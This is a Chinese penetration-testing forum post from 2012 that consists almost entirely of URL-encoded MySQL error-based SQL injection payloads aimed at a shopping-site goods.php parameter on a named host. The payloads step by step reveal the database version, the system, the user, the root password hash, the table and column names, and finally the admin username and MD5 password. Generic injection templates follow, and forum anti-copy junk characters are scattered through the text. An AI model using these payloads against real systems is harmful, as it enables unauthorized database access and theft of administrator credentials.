中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
. D1 f  ?& @2 Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ l+ z: x3 P, n4 z7 F. i5 s5 I. Z9 V: E8 H1 |6 l; v
判断系统# s- S- P3 A. D$ N' Y- i1 o+ ^
1 T$ G! i8 }  f( v( P7 T# i
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ L6 ?) U, ?2 ^2 P" |7 i4 b+ w- Y; A4 z6 r$ e

  _" U6 E7 p& ?: {
6 a4 s2 M# u" q1 K当前 user()
  R* F% b- G7 I! e. x9 j% A
, l. l( V- o7 F" P) j& \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ g/ P4 l4 B3 }- P5 J9 {* ~
# r4 y+ c, ~) Y* P/ B
$ s  b6 X! W6 N. l0 N- y: O& S# X% v

" }4 ?1 S1 ]/ C& l5 r& J当前 database()2 N( `3 q  N/ h- B1 Y2 k; ~
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) S# `( r6 T( W2 N
, d; p: Z8 u9 _5 q- ~6 v  R
6 d/ j& v% D# q( g+ W. @4 r$ I
1 z6 e. R8 q6 L* R  ?6 B9 j3 C( F
8 z  ~% ?$ p8 D3 y8 @9 i# X/ G% proot hash
9 Q, c  H# \+ Z3 b  ^* G+ w' d8 j0 R3 d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: s6 D) X# l5 m8 d1 l9 Q! D  U/ X: [# j' _  J
+ d  I7 f) h3 h1 _
+ E6 t" Q' \! y( b7 F" P
当前 数据库表名
4 G6 \  `% K1 ?3 h, T' ?7 J6 W3 j8 G; F+ `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, L6 K0 o+ \' G- I1 ]  ?
( \/ H8 I6 l7 Q5 m3 O% m; F" |7 \) S" [2 L8 x0 G
9 y9 l- T$ [4 g) b3 u8 C4 e0 [
当前 数据库 user_name 字段4 Z% A$ e% X' L, l, P; x- X
; {5 w  i. y. n7 Z$ v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# f; k3 X  c  z/ C

/ i% i$ \4 x: |' J1 q) v3 |; k当前 数据库 字段 password
; D; G$ Q# _4 R# f; T( \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* C' a! ~" e3 ^" t& ?, K- U' j
$ w9 [) g9 N5 ?9 _" Z& _! J) ?, K* t& Z0 M2 m5 X! C# C( i
! H& ?- u# S. Q6 a
获得 admin passwd(md5)
2 }$ A, J# N8 u( T( p! i& A4 s% _$ r$ \- ?

% Z4 W) u9 o- I: z* w9 Rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. q  X4 f' b/ k  [
( n4 |' v- G+ v8 q. @" N
报错注射
) ]  l& c, f& S# Y( J2 NSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)) I( \6 h8 K$ Q8 p" J- Y9 ]
9 M! {9 C  a3 S! G, }, A
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
7 |7 L" A8 o6 k/ ]/ s1 m$ M  m4 K
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2